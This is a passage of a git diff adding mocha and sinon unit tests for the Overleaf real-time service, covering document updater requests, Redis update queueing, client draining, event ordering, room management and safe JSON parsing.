client.disconnect.called.should.equal(true) + ) + }) + }) +}) diff --git a/services/real-time/test/unit/js/DocumentUpdaterManagerTests.js b/services/real-time/test/unit/js/DocumentUpdaterManagerTests.js new file mode 100644 index 0000000..6dea540 --- /dev/null +++ b/services/real-time/test/unit/js/DocumentUpdaterManagerTests.js @@ -0,0 +1,423 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const SandboxedModule = require('sandboxed-module') +const path = require('node:path') +const modulePath = '../../../app/js/DocumentUpdaterManager' +const _ = require('lodash') + +describe('DocumentUpdaterManager', function () { + beforeEach(function () { + let Timer + this.project_id = 'project-id-923' + this.doc_id = 'doc-id-394' + this.lines = ['one', 'two', 'three'] + this.version = 42 + this.settings = { + apis: { documentupdater: { url: 'http://doc-updater.example.com' } }, + redis: { + documentupdater: { + key_schema: { + pendingUpdates({ doc_id: docId }) { + return `PendingUpdates:${docId}` + }, + }, + }, + }, + maxUpdateSize: 7 * 1024 * 1024, + pendingUpdateListShardCount: 10, + } + this.rclient = { auth() {} } + + return (this.DocumentUpdaterManager = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/settings': this.settings, + request: (this.request = {}), + '@overleaf/redis-wrapper': { createClient: () => this.rclient }, + '@overleaf/metrics': (this.Metrics = { + summary: sinon.stub(), + Timer: (Timer = class Timer { + done() {} + }), + }), + }, + })) + }) // avoid modifying JSON object directly + + describe('getDocument', function () { + beforeEach(function () { + return (this.callback = sinon.stub()) + }) + + describe('successfully', function () { + beforeEach(function () { + this.body = JSON.stringify({ + lines: this.lines, + version: this.version, + ops: (this.ops = ['mock-op-1', 'mock-op-2']), + ranges: (this.ranges = { mock: 'ranges' }), + }) + this.fromVersion = 2 + this.request.get = sinon + .stub() + .callsArgWith(1, null, { statusCode: 200 }, this.body) + return this.DocumentUpdaterManager.getDocument( + this.project_id, + this.doc_id, + this.fromVersion, + this.callback + ) + }) + + it('should get the document from the document updater', function () { + const url = `${this.settings.apis.documentupdater.url}/project/${this.project_id}/doc/${this.doc_id}?fromVersion=${this.fromVersion}` + return this.request.get.calledWith(url).should.equal(true) + }) + + return it('should call the callback with the lines, version, ranges and ops', function () { + return this.callback + .calledWith(null, this.lines, this.version, this.ranges, this.ops) + .should.equal(true) + }) + }) + + describe('when the document updater API returns an error', function () { + beforeEach(function () { + this.request.get = sinon + .stub() + .callsArgWith( + 1, + (this.error = new Error('something went wrong')), + null, + null + ) + return this.DocumentUpdaterManager.getDocument( + this.project_id, + this.doc_id, + this.fromVersion, + this.callback + ) + }) + + return it('should return an error to the callback', function () { + return this.callback.calledWith(this.error).should.equal(true) + }) + }) + ;[404, 422].forEach(statusCode => + describe(`when the 
document updater returns a ${statusCode} status code`, function () { + beforeEach(function () { + this.request.get = sinon + .stub() + .callsArgWith(1, null, { statusCode }, '') + return this.DocumentUpdaterManager.getDocument( + this.project_id, + this.doc_id, + this.fromVersion, + this.callback + ) + }) + + return it('should return the callback with an error', function () { + this.callback.called.should.equal(true) + this.callback + .calledWith( + sinon.match({ + message: 'doc updater could not load requested ops', + info: { statusCode }, + }) + ) + .should.equal(true) + this.logger.error.called.should.equal(false) + this.logger.warn.called.should.equal(false) + }) + }) + ) + + return describe('when the document updater returns a failure error code', function () { + beforeEach(function () { + this.request.get = sinon + .stub() + .callsArgWith(1, null, { statusCode: 500 }, '') + return this.DocumentUpdaterManager.getDocument( + this.project_id, + this.doc_id, + this.fromVersion, + this.callback + ) + }) + + return it('should return the callback with an error', function () { + this.callback.called.should.equal(true) + this.callback + .calledWith( + sinon.match({ + message: 'doc updater returned a non-success status code', + info: { + action: 'getDocument', + statusCode: 500, + }, + }) + ) + .should.equal(true) + this.logger.error.called.should.equal(false) + }) + }) + }) + + describe('flushProjectToMongoAndDelete', function () { + beforeEach(function () { + return (this.callback = sinon.stub()) + }) + + describe('successfully', function () { + beforeEach(function () { + this.request.del = sinon + .stub() + .callsArgWith(1, null, { statusCode: 204 }, '') + return this.DocumentUpdaterManager.flushProjectToMongoAndDelete( + this.project_id, + this.callback + ) + }) + + it('should delete the project from the document updater', function () { + const url = `${this.settings.apis.documentupdater.url}/project/${this.project_id}?background=true` + return this.request.del.calledWith(url).should.equal(true) + }) + + return it('should call the callback with no error', function () { + return this.callback.calledWith(null).should.equal(true) + }) + }) + + describe('when the document updater API returns an error', function () { + beforeEach(function () { + this.request.del = sinon + .stub() + .callsArgWith( + 1, + (this.error = new Error('something went wrong')), + null, + null + ) + return this.DocumentUpdaterManager.flushProjectToMongoAndDelete( + this.project_id, + this.callback + ) + }) + + return it('should return an error to the callback', function () { + return this.callback.calledWith(this.error).should.equal(true) + }) + }) + + return describe('when the document updater returns a failure error code', function () { + beforeEach(function () { + this.request.del = sinon + .stub() + .callsArgWith(1, null, { statusCode: 500 }, '') + return this.DocumentUpdaterManager.flushProjectToMongoAndDelete( + this.project_id, + this.callback + ) + }) + + return it('should return the callback with an error', function () { + this.callback.called.should.equal(true) + this.callback + .calledWith( + sinon.match({ + message: 'doc updater returned a non-success status code', + info: { + action: 'flushProjectToMongoAndDelete', + statusCode: 500, + }, + }) + ) + .should.equal(true) + }) + }) + }) + + describe('queueChange', function () { + beforeEach(function () { + this.change = { + doc: '1234567890', + op: [{ d: 'test', p: 345 }], + v: 789, + } + this.rclient.rpush = sinon.stub().yields() + return (this.callback = 
sinon.stub()) + }) + + describe('successfully', function () { + beforeEach(function () { + this.pendingUpdateListKey = `pending-updates-list-key-${Math.random()}` + + this.DocumentUpdaterManager._getPendingUpdateListKey = sinon + .stub() + .returns(this.pendingUpdateListKey) + this.DocumentUpdaterManager.queueChange( + this.project_id, + this.doc_id, + this.change, + this.callback + ) + }) + + it('should push the change', function () { + this.rclient.rpush + .calledWith( + `PendingUpdates:${this.doc_id}`, + JSON.stringify(this.change) + ) + .should.equal(true) + }) + + it('should notify the doc updater of the change via the pending-updates-list queue', function () { + this.rclient.rpush + .calledWith( + this.pendingUpdateListKey, + `${this.project_id}:${this.doc_id}` + ) + .should.equal(true) + }) + }) + + describe('with error talking to redis during rpush', function () { + beforeEach(function () { + this.rclient.rpush = sinon + .stub() + .yields(new Error('something went wrong')) + return this.DocumentUpdaterManager.queueChange( + this.project_id, + this.doc_id, + this.change, + this.callback + ) + }) + + return it('should return an error', function () { + return this.callback + .calledWithExactly(sinon.match(Error)) + .should.equal(true) + }) + }) + + describe('with null byte corruption', function () { + beforeEach(function () { + this.stringifyStub = sinon + .stub(JSON, 'stringify') + .callsFake(() => '["bad bytes! \u0000 <- here"]') + return this.DocumentUpdaterManager.queueChange( + this.project_id, + this.doc_id, + this.change, + this.callback + ) + }) + + afterEach(function () { + this.stringifyStub.restore() + }) + + it('should return an error', function () { + return this.callback + .calledWithExactly(sinon.match(Error)) + .should.equal(true) + }) + + return it('should not push the change onto the pending-updates-list queue', function () { + return this.rclient.rpush.called.should.equal(false) + }) + }) + + describe('when the update is too large', function () { + beforeEach(function () { + this.change = { + op: { p: 12, t: 'update is too large'.repeat(1024 * 400) }, + } + return this.DocumentUpdaterManager.queueChange( + this.project_id, + this.doc_id, + this.change, + this.callback + ) + }) + + it('should return an error', function () { + return this.callback + .calledWithExactly(sinon.match(Error)) + .should.equal(true) + }) + + it('should add the size to the error', function () { + return this.callback.args[0][0].info.updateSize.should.equal(7782422) + }) + + return it('should not push the change onto the pending-updates-list queue', function () { + return this.rclient.rpush.called.should.equal(false) + }) + }) + + describe('with invalid keys', function () { + beforeEach(function () { + this.change = { + op: [{ d: 'test', p: 345 }], + version: 789, // not a valid key + } + return this.DocumentUpdaterManager.queueChange( + this.project_id, + this.doc_id, + this.change, + this.callback + ) + }) + + it('should remove the invalid keys from the change', function () { + return this.rclient.rpush + .calledWith( + `PendingUpdates:${this.doc_id}`, + JSON.stringify({ op: this.change.op }) + ) + .should.equal(true) + }) + }) + }) + + describe('_getPendingUpdateListKey', function () { + beforeEach(function () { + const keys = _.times( + 10000, + this.DocumentUpdaterManager._getPendingUpdateListKey + ) + this.keys = _.uniq(keys) + }) + it('should return normal pending updates key', function () { + _.includes(this.keys, 'pending-updates-list').should.equal(true) + }) + + it('should return 
pending-updates-list-n keys', function () {
+    _.includes(this.keys, 'pending-updates-list-1').should.equal(true)
+    _.includes(this.keys, 'pending-updates-list-3').should.equal(true)
+    _.includes(this.keys, 'pending-updates-list-9').should.equal(true)
+  })
+
+  it('should not include pending-updates-list-0 key', function () {
+    _.includes(this.keys, 'pending-updates-list-0').should.equal(false)
+  })
+
+  it('should not include a key at the pendingUpdateListShardCount maximum', function () {
+    _.includes(this.keys, 'pending-updates-list-10').should.equal(false)
+  })
+  })
+})
diff --git a/services/real-time/test/unit/js/DrainManagerTests.js b/services/real-time/test/unit/js/DrainManagerTests.js
new file mode 100644
index 0000000..facdc56
--- /dev/null
+++ b/services/real-time/test/unit/js/DrainManagerTests.js
@@ -0,0 +1,127 @@
+/* eslint-disable
+    no-return-assign,
+    no-unused-vars,
+*/
+// TODO: This file was created by bulk-decaffeinate.
+// Fix any style issues and re-enable lint.
+/*
+ * decaffeinate suggestions:
+ * DS102: Remove unnecessary code created because of implicit returns
+ * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md
+ */
+const sinon = require('sinon')
+const SandboxedModule = require('sandboxed-module')
+const path = require('node:path')
+const modulePath = path.join(__dirname, '../../../app/js/DrainManager')
+
+describe('DrainManager', function () {
+  beforeEach(function () {
+    this.DrainManager = SandboxedModule.require(modulePath, {})
+    return (this.io = {
+      sockets: {
+        clients: sinon.stub(),
+      },
+    })
+  })
+
+  describe('startDrainTimeWindow', function () {
+    beforeEach(function () {
+      this.clients = []
+      for (let i = 0; i <= 5399; i++) {
+        this.clients[i] = {
+          id: i,
+          emit: sinon.stub(),
+        }
+      }
+      this.io.sockets.clients.returns(this.clients)
+      return (this.DrainManager.startDrain = sinon.stub())
+    })
+
+    return it('should set a drain rate fast enough', function (done) {
+      this.DrainManager.startDrainTimeWindow(this.io, 9)
+      this.DrainManager.startDrain.calledWith(this.io, 10).should.equal(true)
+      return done()
+    })
+  })
+
+  return describe('reconnectNClients', function () {
+    beforeEach(function () {
+      this.clients = []
+      for (let i = 0; i <= 9; i++) {
+        this.clients[i] = {
+          id: i,
+          emit: sinon.stub(),
+        }
+      }
+      return this.io.sockets.clients.returns(this.clients)
+    })
+
+    return describe('after first pass', function () {
+      beforeEach(function () {
+        return this.DrainManager.reconnectNClients(this.io, 3)
+      })
+
+      it('should reconnect the first 3 clients', function () {
+        return [0, 1, 2].map(i =>
+          this.clients[i].emit
+            .calledWith('reconnectGracefully')
+            .should.equal(true)
+        )
+      })
+
+      it('should not reconnect any more clients', function () {
+        return [3, 4, 5, 6, 7, 8, 9].map(i =>
+          this.clients[i].emit
+            .calledWith('reconnectGracefully')
+            .should.equal(false)
+        )
+      })
+
+      return describe('after second pass', function () {
+        beforeEach(function () {
+          return this.DrainManager.reconnectNClients(this.io, 3)
+        })
+
+        it('should reconnect the next 3 clients', function () {
+          return [3, 4, 5].map(i =>
+            this.clients[i].emit
+              .calledWith('reconnectGracefully')
+              .should.equal(true)
+          )
+        })
+
+        it('should not reconnect any more clients', function () {
+          return [6, 7, 8, 9].map(i =>
+            this.clients[i].emit
+              .calledWith('reconnectGracefully')
+              .should.equal(false)
+          )
+        })
+
+        it('should not reconnect the first 3 clients again', function () {
+          return [0, 1, 2].map(i =>
+            this.clients[i].emit.calledOnce.should.equal(true)
+          )
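+          // Note: the three passes in this suite suggest reconnectNClients
+          // keeps a cursor over io.sockets.clients() and tells at most N
+          // not-yet-told clients per call; a sketch under that assumption
+          // (the cursor name is hypothetical):
+          //
+          //   let cursor = 0
+          //   function reconnectNClients(io, n) {
+          //     const clients = io.sockets.clients()
+          //     for (let told = 0; told < n && cursor < clients.length; told++) {
+          //       clients[cursor++].emit('reconnectGracefully')
+          //     }
+          //     if (cursor >= clients.length) {
+          //       logger.info('All clients have been told to reconnectGracefully')
+          //     }
+          //   }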
+        })
+
+        return describe('after final pass', function () {
+          beforeEach(function () {
+            return this.DrainManager.reconnectNClients(this.io, 100)
+          })
+
+          it('should not reconnect the first 6 clients again', function () {
+            return [0, 1, 2, 3, 4, 5].map(i =>
+              this.clients[i].emit.calledOnce.should.equal(true)
+            )
+          })
+
+          return it('should log that it reached the end', function () {
+            return this.logger.info
+              .calledWith('All clients have been told to reconnectGracefully')
+              .should.equal(true)
+          })
+        })
+      })
+    })
+  })
+})
diff --git a/services/real-time/test/unit/js/EventLoggerTests.js b/services/real-time/test/unit/js/EventLoggerTests.js
new file mode 100644
index 0000000..037f2e2
--- /dev/null
+++ b/services/real-time/test/unit/js/EventLoggerTests.js
@@ -0,0 +1,153 @@
+/* eslint-disable
+    no-return-assign,
+*/
+// TODO: This file was created by bulk-decaffeinate.
+// Fix any style issues and re-enable lint.
+/*
+ * decaffeinate suggestions:
+ * DS102: Remove unnecessary code created because of implicit returns
+ * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md
+ */
+const { expect } = require('chai')
+const SandboxedModule = require('sandboxed-module')
+const modulePath = '../../../app/js/EventLogger'
+const sinon = require('sinon')
+const tk = require('timekeeper')
+
+describe('EventLogger', function () {
+  beforeEach(function () {
+    this.start = Date.now()
+    tk.freeze(new Date(this.start))
+    this.EventLogger = SandboxedModule.require(modulePath, {
+      requires: {
+        '@overleaf/metrics': (this.metrics = { inc: sinon.stub() }),
+      },
+    })
+    this.channel = 'applied-ops'
+    this.id_1 = 'random-hostname:abc-1'
+    this.message_1 = 'message-1'
+    this.id_2 = 'random-hostname:abc-2'
+    return (this.message_2 = 'message-2')
+  })
+
+  afterEach(function () {
+    return tk.reset()
+  })
+
+  return describe('checkEventOrder', function () {
+    describe('when the events are in order', function () {
+      beforeEach(function () {
+        this.EventLogger.checkEventOrder(
+          this.channel,
+          this.id_1,
+          this.message_1
+        )
+        return (this.status = this.EventLogger.checkEventOrder(
+          this.channel,
+          this.id_2,
+          this.message_2
+        ))
+      })
+
+      it('should accept events in order', function () {
+        return expect(this.status).to.be.undefined
+      })
+
+      return it('should increment the valid event metric', function () {
+        return this.metrics.inc
+          .calledWith(`event.${this.channel}.valid`)
+          .should.equals(true)
+      })
+    })
+
+    describe('when there is a duplicate event', function () {
+      beforeEach(function () {
+        this.EventLogger.checkEventOrder(
+          this.channel,
+          this.id_1,
+          this.message_1
+        )
+        return (this.status = this.EventLogger.checkEventOrder(
+          this.channel,
+          this.id_1,
+          this.message_1
+        ))
+      })
+
+      it('should return "duplicate" for the same event', function () {
+        return expect(this.status).to.equal('duplicate')
+      })
+
+      return it('should increment the duplicate event metric', function () {
+        return this.metrics.inc
+          .calledWith(`event.${this.channel}.duplicate`)
+          .should.equals(true)
+      })
+    })
+
+    describe('when there are out of order events', function () {
+      beforeEach(function () {
+        this.EventLogger.checkEventOrder(
+          this.channel,
+          this.id_1,
+          this.message_1
+        )
+        this.EventLogger.checkEventOrder(
+          this.channel,
+          this.id_2,
+          this.message_2
+        )
+        return (this.status = this.EventLogger.checkEventOrder(
+          this.channel,
+          this.id_1,
+          this.message_1
+        ))
+      })
+
+      it('should return "out-of-order" for the event', function () {
+        return expect(this.status).to.equal('out-of-order')
+      })
+
+      return it('should increment the out-of-order event metric', function () {
+        return this.metrics.inc
+          .calledWith(`event.${this.channel}.out-of-order`)
+          .should.equals(true)
+      })
+    })
+
+    return describe('after MAX_STALE_TIME_IN_MS', function () {
+      return it('should flush old entries', function () {
+        let status
+        this.EventLogger.MAX_EVENTS_BEFORE_CLEAN = 10
+        this.EventLogger.checkEventOrder(
+          this.channel,
+          this.id_1,
+          this.message_1
+        )
+        for (let i = 1; i <= 8; i++) {
+          status = this.EventLogger.checkEventOrder(
+            this.channel,
+            this.id_1,
+            this.message_1
+          )
+          expect(status).to.equal('duplicate')
+        }
+        // the next event should flush the old entries above
+        this.EventLogger.MAX_STALE_TIME_IN_MS = 1000
+        tk.freeze(new Date(this.start + 5 * 1000))
+        // because we flushed the entries this should not be a duplicate
+        this.EventLogger.checkEventOrder(
+          this.channel,
+          'other-1',
+          this.message_2
+        )
+        status = this.EventLogger.checkEventOrder(
+          this.channel,
+          this.id_1,
+          this.message_1
+        )
+        return expect(status).to.be.undefined
+      })
+    })
+  })
+})
diff --git a/services/real-time/test/unit/js/RoomManagerTests.js b/services/real-time/test/unit/js/RoomManagerTests.js
new file mode 100644
index 0000000..f33d2ec
--- /dev/null
+++ b/services/real-time/test/unit/js/RoomManagerTests.js
@@ -0,0 +1,412 @@
+/* eslint-disable
+    no-return-assign,
+    no-unused-vars,
+    promise/param-names,
+*/
+// TODO: This file was created by bulk-decaffeinate.
+// Fix any style issues and re-enable lint.
+/*
+ * decaffeinate suggestions:
+ * DS102: Remove unnecessary code created because of implicit returns
+ * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md
+ */
+const { expect } = require('chai')
+const sinon = require('sinon')
+const modulePath = '../../../app/js/RoomManager.js'
+const SandboxedModule = require('sandboxed-module')
+
+describe('RoomManager', function () {
+  beforeEach(function () {
+    this.project_id = 'project-id-123'
+    this.doc_id = 'doc-id-456'
+    this.other_doc_id = 'doc-id-789'
+    this.client = { namespace: { name: '' }, id: 'first-client' }
+    this.RoomManager = SandboxedModule.require(modulePath, {
+      requires: {
+        '@overleaf/settings': (this.settings = {}),
+        '@overleaf/metrics': (this.metrics = { gauge: sinon.stub() }),
+      },
+    })
+    this.RoomManager._clientsInRoom = sinon.stub()
+    this.RoomManager._clientAlreadyInRoom = sinon.stub()
+    this.RoomEvents = this.RoomManager.eventSource()
+    sinon.spy(this.RoomEvents, 'emit')
+    return sinon.spy(this.RoomEvents, 'once')
+  })
+
+  describe('emitOnCompletion', function () {
+    return describe('when a subscribe errors', function () {
+      afterEach(function () {
+        return process.removeListener('unhandledRejection', this.onUnhandled)
+      })
+
+      beforeEach(function (done) {
+        this.onUnhandled = error => {
+          this.unhandledError = error
+          return done(new Error(`unhandledRejection: ${error.message}`))
+        }
+        process.on('unhandledRejection', this.onUnhandled)
+
+        let reject
+        const subscribePromise = new Promise((_, r) => (reject = r))
+        const promises = [subscribePromise]
+        const eventName = 'project-subscribed-123'
+        this.RoomEvents.once(eventName, () => setTimeout(done, 100))
+        this.RoomManager.emitOnCompletion(promises, eventName)
+        return setTimeout(() => reject(new Error('subscribe failed')))
+      })
+
+      return it('should keep going', function () {
+        return expect(this.unhandledError).to.not.exist
+      })
+    })
+  })
+
+  describe('joinProject', function () {
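+    // Note: the join/leave suites below pin down a room lifecycle along
+    // these lines (a sketch; the event names are the ones asserted here):
+    //
+    //   joinProject(client, projectId, cb):
+    //     if this is the first client in the room, emit 'project-active'
+    //     and defer cb until 'project-subscribed-<id>' fires (i.e. until
+    //     the channel subscription completes); otherwise call back at once.
+    //     Either way, client.join(projectId).
+    //
+    //   leaveDoc(client, docId):
+    //     only a client that was actually in the room leaves it, and
+    //     'doc-empty' is emitted only when no clients remain.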
describe('when the project room is empty', function () { + beforeEach(function (done) { + this.RoomManager._clientsInRoom + .withArgs(this.client, this.project_id) + .onFirstCall() + .returns(0) + this.client.join = sinon.stub() + this.callback = sinon.stub() + this.RoomEvents.on('project-active', id => { + return setTimeout(() => { + return this.RoomEvents.emit(`project-subscribed-${id}`) + }, 100) + }) + return this.RoomManager.joinProject( + this.client, + this.project_id, + err => { + this.callback(err) + return done() + } + ) + }) + + it("should emit a 'project-active' event with the id", function () { + return this.RoomEvents.emit + .calledWithExactly('project-active', this.project_id) + .should.equal(true) + }) + + it("should listen for the 'project-subscribed-id' event", function () { + return this.RoomEvents.once + .calledWith(`project-subscribed-${this.project_id}`) + .should.equal(true) + }) + + return it('should join the room using the id', function () { + return this.client.join + .calledWithExactly(this.project_id) + .should.equal(true) + }) + }) + + return describe('when there are other clients in the project room', function () { + beforeEach(function (done) { + this.RoomManager._clientsInRoom + .withArgs(this.client, this.project_id) + .onFirstCall() + .returns(123) + .onSecondCall() + .returns(124) + this.client.join = sinon.stub() + this.RoomManager.joinProject(this.client, this.project_id, done) + }) + + it('should join the room using the id', function () { + return this.client.join.called.should.equal(true) + }) + + return it('should not emit any events', function () { + return this.RoomEvents.emit.called.should.equal(false) + }) + }) + }) + + describe('joinDoc', function () { + describe('when the doc room is empty', function () { + beforeEach(function (done) { + this.RoomManager._clientsInRoom + .withArgs(this.client, this.doc_id) + .onFirstCall() + .returns(0) + this.client.join = sinon.stub() + this.callback = sinon.stub() + this.RoomEvents.on('doc-active', id => { + return setTimeout(() => { + return this.RoomEvents.emit(`doc-subscribed-${id}`) + }, 100) + }) + return this.RoomManager.joinDoc(this.client, this.doc_id, err => { + this.callback(err) + return done() + }) + }) + + it("should emit a 'doc-active' event with the id", function () { + return this.RoomEvents.emit + .calledWithExactly('doc-active', this.doc_id) + .should.equal(true) + }) + + it("should listen for the 'doc-subscribed-id' event", function () { + return this.RoomEvents.once + .calledWith(`doc-subscribed-${this.doc_id}`) + .should.equal(true) + }) + + return it('should join the room using the id', function () { + return this.client.join + .calledWithExactly(this.doc_id) + .should.equal(true) + }) + }) + + return describe('when there are other clients in the doc room', function () { + beforeEach(function (done) { + this.RoomManager._clientsInRoom + .withArgs(this.client, this.doc_id) + .onFirstCall() + .returns(123) + .onSecondCall() + .returns(124) + this.client.join = sinon.stub() + this.RoomManager.joinDoc(this.client, this.doc_id, done) + }) + + it('should join the room using the id', function () { + return this.client.join.called.should.equal(true) + }) + + return it('should not emit any events', function () { + return this.RoomEvents.emit.called.should.equal(false) + }) + }) + }) + + describe('leaveDoc', function () { + describe('when doc room will be empty after this client has left', function () { + beforeEach(function () { + this.RoomManager._clientAlreadyInRoom + .withArgs(this.client, 
this.doc_id) + .returns(true) + this.RoomManager._clientsInRoom + .withArgs(this.client, this.doc_id) + .onCall(0) + .returns(0) + this.client.leave = sinon.stub() + return this.RoomManager.leaveDoc(this.client, this.doc_id) + }) + + it('should leave the room using the id', function () { + return this.client.leave + .calledWithExactly(this.doc_id) + .should.equal(true) + }) + + return it("should emit a 'doc-empty' event with the id", function () { + return this.RoomEvents.emit + .calledWithExactly('doc-empty', this.doc_id) + .should.equal(true) + }) + }) + + describe('when there are other clients in the doc room', function () { + beforeEach(function () { + this.RoomManager._clientAlreadyInRoom + .withArgs(this.client, this.doc_id) + .returns(true) + this.RoomManager._clientsInRoom + .withArgs(this.client, this.doc_id) + .onCall(0) + .returns(123) + this.client.leave = sinon.stub() + return this.RoomManager.leaveDoc(this.client, this.doc_id) + }) + + it('should leave the room using the id', function () { + return this.client.leave + .calledWithExactly(this.doc_id) + .should.equal(true) + }) + + return it('should not emit any events', function () { + return this.RoomEvents.emit.called.should.equal(false) + }) + }) + + return describe('when the client is not in the doc room', function () { + beforeEach(function () { + this.RoomManager._clientAlreadyInRoom + .withArgs(this.client, this.doc_id) + .returns(false) + this.RoomManager._clientsInRoom + .withArgs(this.client, this.doc_id) + .onCall(0) + .returns(0) + this.client.leave = sinon.stub() + return this.RoomManager.leaveDoc(this.client, this.doc_id) + }) + + it('should not leave the room', function () { + return this.client.leave.called.should.equal(false) + }) + + return it('should not emit any events', function () { + return this.RoomEvents.emit.called.should.equal(false) + }) + }) + }) + + return describe('leaveProjectAndDocs', function () { + return describe('when the client is connected to the project and multiple docs', function () { + beforeEach(function () { + this.RoomManager._roomsClientIsIn = sinon + .stub() + .returns([this.project_id, this.doc_id, this.other_doc_id]) + this.client.join = sinon.stub() + return (this.client.leave = sinon.stub()) + }) + + describe('when this is the only client connected', function () { + beforeEach(function (done) { + // first call is for the join, + // second for the leave + this.RoomManager._clientsInRoom + .withArgs(this.client, this.doc_id) + .onCall(0) + .returns(0) + .onCall(1) + .returns(0) + this.RoomManager._clientsInRoom + .withArgs(this.client, this.other_doc_id) + .onCall(0) + .returns(0) + .onCall(1) + .returns(0) + this.RoomManager._clientsInRoom + .withArgs(this.client, this.project_id) + .onCall(0) + .returns(0) + .onCall(1) + .returns(0) + this.RoomManager._clientAlreadyInRoom + .withArgs(this.client, this.doc_id) + .returns(true) + .withArgs(this.client, this.other_doc_id) + .returns(true) + .withArgs(this.client, this.project_id) + .returns(true) + this.RoomEvents.on('project-active', id => { + return setTimeout(() => { + return this.RoomEvents.emit(`project-subscribed-${id}`) + }, 100) + }) + this.RoomEvents.on('doc-active', id => { + return setTimeout(() => { + return this.RoomEvents.emit(`doc-subscribed-${id}`) + }, 100) + }) + // put the client in the rooms + return this.RoomManager.joinProject( + this.client, + this.project_id, + () => { + return this.RoomManager.joinDoc(this.client, this.doc_id, () => { + return this.RoomManager.joinDoc( + this.client, + this.other_doc_id, 
+ () => { + // now leave the project + this.RoomManager.leaveProjectAndDocs(this.client) + return done() + } + ) + }) + } + ) + }) + + it('should leave all the docs', function () { + this.client.leave.calledWithExactly(this.doc_id).should.equal(true) + return this.client.leave + .calledWithExactly(this.other_doc_id) + .should.equal(true) + }) + + it('should leave the project', function () { + return this.client.leave + .calledWithExactly(this.project_id) + .should.equal(true) + }) + + it("should emit a 'doc-empty' event with the id for each doc", function () { + this.RoomEvents.emit + .calledWithExactly('doc-empty', this.doc_id) + .should.equal(true) + return this.RoomEvents.emit + .calledWithExactly('doc-empty', this.other_doc_id) + .should.equal(true) + }) + + return it("should emit a 'project-empty' event with the id for the project", function () { + return this.RoomEvents.emit + .calledWithExactly('project-empty', this.project_id) + .should.equal(true) + }) + }) + + return describe('when other clients are still connected', function () { + beforeEach(function () { + this.RoomManager._clientsInRoom + .withArgs(this.client, this.doc_id) + .onFirstCall() + .returns(123) + .onSecondCall() + .returns(122) + this.RoomManager._clientsInRoom + .withArgs(this.client, this.other_doc_id) + .onFirstCall() + .returns(123) + .onSecondCall() + .returns(122) + this.RoomManager._clientsInRoom + .withArgs(this.client, this.project_id) + .onFirstCall() + .returns(123) + .onSecondCall() + .returns(122) + this.RoomManager._clientAlreadyInRoom + .withArgs(this.client, this.doc_id) + .returns(true) + .withArgs(this.client, this.other_doc_id) + .returns(true) + .withArgs(this.client, this.project_id) + .returns(true) + return this.RoomManager.leaveProjectAndDocs(this.client) + }) + + it('should leave all the docs', function () { + this.client.leave.calledWithExactly(this.doc_id).should.equal(true) + return this.client.leave + .calledWithExactly(this.other_doc_id) + .should.equal(true) + }) + + it('should leave the project', function () { + return this.client.leave + .calledWithExactly(this.project_id) + .should.equal(true) + }) + + return it('should not emit any events', function () { + return this.RoomEvents.emit.called.should.equal(false) + }) + }) + }) + }) +}) diff --git a/services/real-time/test/unit/js/SafeJsonParseTest.js b/services/real-time/test/unit/js/SafeJsonParseTest.js new file mode 100644 index 0000000..e5712fc --- /dev/null +++ b/services/real-time/test/unit/js/SafeJsonParseTest.js @@ -0,0 +1,55 @@ +/* eslint-disable + no-return-assign, + no-useless-escape, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
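+// Editor's note: a minimal sketch of what SafeJsonParse appears to do, based
+// on the tests below (an assumption, not the module's actual source): reject
+// anything larger than Settings.maxUpdateSize (the real module allows some
+// overhead on top of this limit), then JSON.parse inside try/catch.
+//
+// const Settings = require('@overleaf/settings')
+// module.exports = {
+//   parse(data, callback) {
+//     if (data.length > Settings.maxUpdateSize) {
+//       return callback(new Error('data too large'))
+//     }
+//     let parsed
+//     try {
+//       parsed = JSON.parse(data)
+//     } catch (error) {
+//       return callback(error)
+//     }
+//     return callback(null, parsed)
+//   },
+// }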
+/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const { expect } = require('chai') +const SandboxedModule = require('sandboxed-module') +const modulePath = '../../../app/js/SafeJsonParse' + +describe('SafeJsonParse', function () { + beforeEach(function () { + return (this.SafeJsonParse = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/settings': (this.Settings = { + maxUpdateSize: 16 * 1024, + }), + }, + })) + }) + + return describe('parse', function () { + it('should parse documents correctly', function (done) { + return this.SafeJsonParse.parse('{"foo": "bar"}', (error, parsed) => { + if (error) return done(error) + expect(parsed).to.deep.equal({ foo: 'bar' }) + return done() + }) + }) + + it('should return an error on bad data', function (done) { + return this.SafeJsonParse.parse('blah', (error, parsed) => { + expect(error).to.exist + return done() + }) + }) + + return it('should return an error on oversized data', function (done) { + // we have a 2k overhead on top of max size + const bigBlob = Array(16 * 1024).join('A') + const data = `{\"foo\": \"${bigBlob}\"}` + this.Settings.maxUpdateSize = 2 * 1024 + return this.SafeJsonParse.parse(data, (error, parsed) => { + this.logger.error.called.should.equal(false) + expect(error).to.exist + return done() + }) + }) + }) +}) diff --git a/services/real-time/test/unit/js/SessionSocketsTests.js b/services/real-time/test/unit/js/SessionSocketsTests.js new file mode 100644 index 0000000..c2a9ad3 --- /dev/null +++ b/services/real-time/test/unit/js/SessionSocketsTests.js @@ -0,0 +1,280 @@ +/* eslint-disable + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
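+// Editor's note: the tests below pin down the SessionSockets contract; this
+// is a minimal sketch consistent with them (assumed, not the real
+// implementation, which also increments the session.cookie metric):
+//
+// const { EventEmitter } = require('node:events')
+// module.exports = function (io, sessionStore, cookieParser, cookieName) {
+//   const sessionSockets = new EventEmitter()
+//   io.on('connection', socket => {
+//     const req = socket.handshake
+//     cookieParser(req, {}, () => {
+//       const sessionId = req.signedCookies && req.signedCookies[cookieName]
+//       if (!sessionId) {
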